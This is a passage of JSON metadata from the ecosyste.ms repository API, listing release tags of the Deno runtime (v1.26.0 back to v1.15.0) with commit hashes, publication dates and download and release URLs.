ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb